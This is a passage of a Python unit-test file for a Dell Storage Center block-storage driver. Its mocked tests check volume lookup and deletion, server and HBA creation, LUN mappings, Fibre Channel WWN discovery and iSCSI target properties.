'get_volume')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_import_one',
return_value=None)
def test_find_volume_with_provider_id_import_fail(self,
mock_import_one,
mock_get_volume,
mock_close_connection,
mock_open_connection,
mock_init):
provider_id = str(self.scapi.ssn) + '.1'
# Configure to middle of failover.
self.scapi.failed_over = True
mock_get_volume.return_value = {'name': self.repl_name}
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.find_volume, self.volume_name,
provider_id)
self.scapi.failed_over = False
mock_import_one.assert_called_once_with(mock_get_volume.return_value,
self.volume_name)
mock_get_volume.assert_called_once_with(provider_id)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=None)
def test_search_for_volume_no_name(self,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
# Test calling _search_for_volume with no name or instanceid
res = self.scapi._search_for_volume(None)
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list')
def test_search_for_volume_not_found(self,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
# Test calling _search_for_volume when no volume is found
mock_get_volume_list.side_effect = [[], []]
res = self.scapi._search_for_volume(self.volume_name)
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=VOLUME_LIST_MULTI_VOLS)
def test_search_for_volume_multi_vols_found(self,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where multiple volumes are found
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi._search_for_volume, self.volume_name)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=VOLUME)
def test_get_volume(self,
mock_get_json,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
provider_id = str(self.scapi.ssn) + '.1'
res = self.scapi.get_volume(provider_id)
mock_get.assert_called_once_with(
'StorageCenter/ScVolume/' + provider_id)
self.assertEqual(self.VOLUME, res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
def test_get_volume_error(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
provider_id = str(self.scapi.ssn) + '.1'
res = self.scapi.get_volume(provider_id)
mock_get.assert_called_once_with(
'StorageCenter/ScVolume/' + provider_id)
self.assertIsNone(res)
def test_get_volume_no_id(self,
mock_close_connection,
mock_open_connection,
mock_init):
provider_id = None
res = self.scapi.get_volume(provider_id)
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=True)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_search_for_volume',
return_value=VOLUME)
def test_delete_volume(self,
mock_search_for_volume,
mock_delete,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.delete_volume(self.volume_name)
self.assertTrue(mock_delete.called)
mock_search_for_volume.assert_called_once_with(self.volume_name)
self.assertTrue(mock_get_json.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=True)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_200)
def test_delete_volume_with_provider_id(self,
mock_delete,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
provider_id = str(self.scapi.ssn) + '.1'
res = self.scapi.delete_volume(self.volume_name, provider_id)
self.assertTrue(mock_delete.called)
self.assertTrue(mock_get_json.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_400)
def test_delete_volume_failure(self,
mock_delete,
mock_close_connection,
mock_open_connection,
mock_init):
provider_id = str(self.scapi.ssn) + '.1'
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.delete_volume, self.volume_name,
provider_id)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_search_for_volume',
return_value=None)
def test_delete_volume_no_vol_found(self,
mock_search_for_volume,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where volume to be deleted does not exist
res = self.scapi.delete_volume(self.volume_name, None)
mock_search_for_volume.assert_called_once_with(self.volume_name)
self.assertTrue(res, 'Expected True')
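# Note that delete_volume returns True when the volume is already gone,
# so deletes are effectively idempotent from the caller's point of view.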
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_folder',
return_value=SVR_FLDR)
def test_find_server_folder(self,
mock_find_folder,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_server_folder(False)
mock_find_folder.assert_called_once_with(
'StorageCenter/ScServerFolder/GetList',
self.configuration.dell_sc_server_folder)
self.assertEqual(self.SVR_FLDR, res, 'Unexpected server folder')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_create_folder_path',
return_value=SVR_FLDR)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_folder',
return_value=None)
def test_find_server_folder_create_folder(self,
mock_find_folder,
mock_create_folder_path,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where specified server folder is not found and must be
# created
res = self.scapi._find_server_folder(True)
mock_find_folder.assert_called_once_with(
'StorageCenter/ScServerFolder/GetList',
self.configuration.dell_sc_server_folder)
self.assertTrue(mock_create_folder_path.called)
self.assertEqual(self.SVR_FLDR, res, 'Unexpected server folder')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_folder',
return_value=None)
def test_find_server_folder_fail(self,
mock_find_folder,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where _find_server_folder returns none
res = self.scapi._find_server_folder(
False)
mock_find_folder.assert_called_once_with(
'StorageCenter/ScServerFolder/GetList',
self.configuration.dell_sc_server_folder)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_add_hba(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._add_hba(self.SCSERVER,
self.IQN)
self.assertTrue(mock_post.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_add_hba_fc(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
saveproto = self.scapi.protocol
self.scapi.protocol = 'FibreChannel'
res = self.scapi._add_hba(self.SCSERVER,
self.WWN)
self.assertTrue(mock_post.called)
self.assertTrue(res)
self.scapi.protocol = saveproto
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
def test_add_hba_failure(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._add_hba(self.SCSERVER,
self.IQN)
self.assertTrue(mock_post.called)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=SVR_OS_S)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_serveros(self,
mock_post,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_serveros('Red Hat Linux 6.x')
self.assertTrue(mock_get_json.called)
self.assertTrue(mock_post.called)
self.assertEqual('64702.38', res, 'Wrong InstanceId')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=SVR_OS_S)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_serveros_not_found(self,
mock_post,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
# Test requesting a Server OS that will not be found
res = self.scapi._find_serveros('Non existent OS')
self.assertTrue(mock_get_json.called)
self.assertTrue(mock_post.called)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
def test_find_serveros_failed(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_serveros('Red Hat Linux 6.x')
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_hba',
return_value=FC_HBA)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'create_server',
return_value=SCSERVER)
def test_create_server_multiple_hbas(self,
mock_create_server,
mock_add_hba,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.create_server_multiple_hbas(
self.WWNS)
self.assertTrue(mock_create_server.called)
self.assertTrue(mock_add_hba.called)
self.assertEqual(self.SCSERVER, res, 'Unexpected ScServer')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_hba',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=SCSERVER)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_server_folder',
return_value=SVR_FLDR)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_serveros',
return_value='64702.38')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_server(self,
mock_post,
mock_find_serveros,
mock_find_server_folder,
mock_first_result,
mock_add_hba,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.create_server(self.IQN)
self.assertTrue(mock_find_serveros.called)
self.assertTrue(mock_find_server_folder.called)
self.assertTrue(mock_first_result.called)
self.assertTrue(mock_add_hba.called)
self.assertEqual(self.SCSERVER, res, 'Unexpected ScServer')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_hba',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=SCSERVER)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_server_folder',
return_value=SVR_FLDR)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_serveros',
return_value=None)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_server_os_not_found(self,
mock_post,
mock_find_serveros,
mock_find_server_folder,
mock_first_result,
mock_add_hba,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.create_server(self.IQN)
self.assertTrue(mock_find_serveros.called)
self.assertEqual(self.SCSERVER, res, 'Unexpected ScServer')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_hba',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=SCSERVER)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_server_folder',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_serveros',
return_value='64702.38')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_server_fldr_not_found(self,
mock_post,
mock_find_serveros,
mock_find_server_folder,
mock_first_result,
mock_add_hba,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.create_server(self.IQN)
self.assertTrue(mock_find_server_folder.called)
self.assertEqual(self.SCSERVER, res, 'Unexpected ScServer')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_hba',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=SCSERVER)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_server_folder',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_serveros',
return_value='64702.38')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
def test_create_server_failure(self,
mock_post,
mock_find_serveros,
mock_find_server_folder,
mock_first_result,
mock_add_hba,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.create_server(self.IQN)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_hba',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_server_folder',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_serveros',
return_value='64702.38')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_server_not_found(self,
mock_post,
mock_find_serveros,
mock_find_server_folder,
mock_first_result,
mock_add_hba,
mock_close_connection,
mock_open_connection,
mock_init):
# Test create server where _first_result is None
res = self.scapi.create_server(self.IQN)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_delete_server',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_hba',
return_value=False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=SCSERVER)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_server_folder',
return_value=SVR_FLDR)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_serveros',
return_value='64702.38')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_server_addhba_fail(self,
mock_post,
mock_find_serveros,
mock_find_server_folder,
mock_first_result,
mock_add_hba,
mock_delete_server,
mock_close_connection,
mock_open_connection,
mock_init):
# Tests create server where add hba fails
res = self.scapi.create_server(self.IQN)
self.assertTrue(mock_delete_server.called)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=SCSERVER)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_serverhba',
return_value=ISCSI_HBA)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_server(self,
mock_post,
mock_find_serverhba,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.find_server(self.IQN)
self.assertTrue(mock_find_serverhba.called)
self.assertTrue(mock_first_result.called)
self.assertIsNotNone(res, 'Expected ScServer')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_serverhba',
return_value=None)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_server_no_hba(self,
mock_post,
mock_find_serverhba,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where a ScServer HBA does not exist with the specified IQN
# or WWN
res = self.scapi.find_server(self.IQN)
self.assertTrue(mock_find_serverhba.called)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_serverhba',
return_value=ISCSI_HBA)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test_find_server_failure(self,
mock_post,
mock_find_serverhba,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where a ScServer does not exist with the specified
# ScServerHba
res = self.scapi.find_server(self.IQN)
self.assertTrue(mock_find_serverhba.called)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=ISCSI_HBA)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_serverhba(self,
mock_post,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.find_server(self.IQN)
self.assertTrue(mock_post.called)
self.assertTrue(mock_first_result.called)
self.assertIsNotNone(res, 'Expected ScServerHba')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test_find_serverhba_failure(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where the post searching for the ScServerHba fails
res = self.scapi.find_server(self.IQN)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=ISCSI_FLT_DOMAINS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_domains(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_domains(u'64702.5764839588723736074.69')
self.assertTrue(mock_get.called)
self.assertTrue(mock_get_json.called)
self.assertEqual(
self.ISCSI_FLT_DOMAINS, res, 'Unexpected ScIscsiFaultDomain')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_204)
def test_find_domains_error(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where get of ScControllerPort FaultDomainList fails
res = self.scapi._find_domains(u'64702.5764839588723736074.69')
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=FC_HBAS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_initiators(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_initiators(self.SCSERVER)
self.assertTrue(mock_get.called)
self.assertTrue(mock_get_json.called)
self.assertIsNotNone(res, 'Expected WWN list')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
def test_find_initiators_error(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where get of ScServer HbaList fails
res = self.scapi._find_initiators(self.SCSERVER)
self.assertListEqual([], res, 'Expected empty list')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_get_volume_count(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.get_volume_count(self.SCSERVER)
self.assertTrue(mock_get.called)
self.assertTrue(mock_get_json.called)
self.assertEqual(len(self.MAPPINGS), res, 'Mapping count mismatch')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
def test_get_volume_count_failure(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where the get of the ScServer MappingList fails
res = self.scapi.get_volume_count(self.SCSERVER)
self.assertTrue(mock_get.called)
self.assertEqual(-1, res, 'Mapping count not -1')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[])
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_get_volume_count_no_volumes(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.get_volume_count(self.SCSERVER)
self.assertTrue(mock_get.called)
self.assertTrue(mock_get_json.called)
self.assertEqual(len([]), res, 'Mapping count mismatch')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_mappings(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_mappings(self.VOLUME)
self.assertTrue(mock_get.called)
self.assertTrue(mock_get_json.called)
self.assertEqual(self.MAPPINGS, res, 'Mapping mismatch')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_mappings_inactive_vol(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
# Test getting volume mappings on inactive volume
res = self.scapi._find_mappings(self.INACTIVE_VOLUME)
self.assertFalse(mock_get.called)
self.assertEqual([], res, 'No mappings expected')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
def test_find_mappings_failure(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where the get of the ScVolume MappingList fails
res = self.scapi._find_mappings(self.VOLUME)
self.assertTrue(mock_get.called)
self.assertEqual([], res, 'Mapping count not empty')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[])
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_mappings_no_mappings(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where ScVolume has no mappings
res = self.scapi._find_mappings(self.VOLUME)
self.assertTrue(mock_get.called)
self.assertTrue(mock_get_json.called)
self.assertEqual([], res, 'Mapping count mismatch')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=MAP_PROFILES)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_mapping_profiles(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where mapping profiles exist for the ScVolume
res = self.scapi._find_mapping_profiles(self.VOLUME)
self.assertTrue(mock_get.called)
self.assertTrue(mock_get_json.called)
self.assertEqual(self.MAP_PROFILES, res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
def test_find_mapping_profiles_error(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where the get of the ScVolume mapping profiles fails
res = self.scapi._find_mapping_profiles(self.VOLUME)
self.assertTrue(mock_get.called)
self.assertEqual([], res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_controller_port(self,
mock_get,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_controller_port(u'64702.5764839588723736070.51')
self.assertTrue(mock_get.called)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.CTRLR_PORT, res, 'ScControllerPort mismatch')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_204)
def test_find_controller_port_failure(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where the get of the ScControllerPort fails
res = self.scapi._find_controller_port(self.VOLUME)
self.assertTrue(mock_get.called)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=FC_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=FC_MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_initiators',
return_value=WWNS)
def test_find_wwns(self,
mock_find_initiators,
mock_find_mappings,
mock_find_controller_port,
mock_close_connection,
mock_open_connection,
mock_init):
lun, wwns, itmap = self.scapi.find_wwns(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_initiators.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_controller_port.called)
# The _find_controller_port is Mocked, so all mapping pairs
# will have the same WWN for the ScControllerPort
itmapCompare = {u'21000024FF30441C': [u'5000D31000FCBE36'],
u'21000024FF30441D':
[u'5000D31000FCBE36', u'5000D31000FCBE36']}
self.assertEqual(1, lun, 'Incorrect LUN')
self.assertIsNotNone(wwns, 'WWNs is None')
self.assertEqual(itmapCompare, itmap, 'WWN mapping incorrect')
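# find_wwns returns a (lun, wwns, itmap) triple: the mapped LUN, the list
# of target WWNs and an initiator-to-target map keyed by initiator WWN.
# Because _find_controller_port is mocked to a single port here, every
# target entry collapses to the same WWN.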
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=[])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_initiators',
return_value=FC_HBAS)
def test_find_wwns_no_mappings(self,
mock_find_initiators,
mock_find_mappings,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where there are no ScMapping(s)
lun, wwns, itmap = self.scapi.find_wwns(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_initiators.called)
self.assertTrue(mock_find_mappings.called)
self.assertIsNone(lun, 'Incorrect LUN')
self.assertEqual([], wwns, 'WWNs is not empty')
self.assertEqual({}, itmap, 'WWN mapping not empty')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=FC_MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_initiators',
return_value=WWNS)
def test_find_wwns_no_ctlr_port(self,
mock_find_initiators,
mock_find_mappings,
mock_find_controller_port,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where ScControllerPort is none
lun, wwns, itmap = self.scapi.find_wwns(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_initiators.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_controller_port.called)
self.assertIsNone(lun, 'Incorrect LUN')
self.assertEqual([], wwns, 'WWNs is not empty')
self.assertEqual({}, itmap, 'WWN mapping not empty')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=FC_CTRLR_PORT_WWN_ERROR)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=FC_MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_initiators',
return_value=WWNS)
def test_find_wwns_wwn_error(self,
mock_find_initiators,
mock_find_mappings,
mock_find_controller_port,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where ScControllerPort object has WWn instead of wwn for a
# property
lun, wwns, itmap = self.scapi.find_wwns(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_initiators.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_controller_port.called)
self.assertIsNone(lun, 'Incorrect LUN')
self.assertEqual([], wwns, 'WWNs is not empty')
self.assertEqual({}, itmap, 'WWN mapping not empty')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=FC_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=FC_MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_initiators',
return_value=WWNS_NO_MATCH)
# Test case where HBA name is not found in list of initiators
def test_find_wwns_hbaname_not_found(self,
mock_find_initiators,
mock_find_mappings,
mock_find_controller_port,
mock_close_connection,
mock_open_connection,
mock_init):
lun, wwns, itmap = self.scapi.find_wwns(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_initiators.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_controller_port.called)
self.assertIsNone(lun, 'Incorrect LUN')
self.assertEqual([], wwns, 'WWNs is not empty')
self.assertEqual({}, itmap, 'WWN mapping not empty')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=FC_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=FC_MAPPINGS_LUN_MISMATCH)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_initiators',
return_value=WWNS)
# Test case where FC mappings contain a LUN mismatch
def test_find_wwns_lun_mismatch(self,
mock_find_initiators,
mock_find_mappings,
mock_find_controller_port,
mock_close_connection,
mock_open_connection,
mock_init):
lun, wwns, itmap = self.scapi.find_wwns(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_initiators.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_controller_port.called)
# The _find_controller_port is Mocked, so all mapping pairs
# will have the same WWN for the ScControllerPort
itmapCompare = {u'21000024FF30441C': [u'5000D31000FCBE36'],
u'21000024FF30441D':
[u'5000D31000FCBE36', u'5000D31000FCBE36']}
self.assertEqual(1, lun, 'Incorrect LUN')
self.assertIsNotNone(wwns, 'WWNs is None')
self.assertEqual(itmapCompare, itmap, 'WWN mapping incorrect')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=VOLUME_CONFIG)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_active_controller(self,
mock_get,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_active_controller(self.VOLUME)
self.assertTrue(mock_get.called)
self.assertTrue(mock_first_result.called)
self.assertEqual('64702.64703', res, 'Unexpected Active Controller')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
def test_find_active_controller_failure(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where the get of the ScVolume configuration fails
res = self.scapi._find_active_controller(self.VOLUME)
self.assertTrue(mock_get.called)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.5764839588723736131.91')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_domains',
return_value=ISCSI_FLT_DOMAINS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=True)
def test_find_iscsi_properties_mappings(self,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_domains,
mock_find_ctrl_port,
mock_find_active_controller,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.find_iscsi_properties(self.VOLUME)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_domains.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_active_controller.called)
expected = {'target_discovered': False,
'target_iqn':
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
'target_iqns':
[u'iqn.2002-03.com.compellent:5000d31000fcbe43'],
'target_lun': 1,
'target_luns': [1],
'target_portal': u'192.168.0.21:3260',
'target_portals': [u'192.168.0.21:3260']}
self.assertEqual(expected, res, 'Wrong Target Info')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.64702')
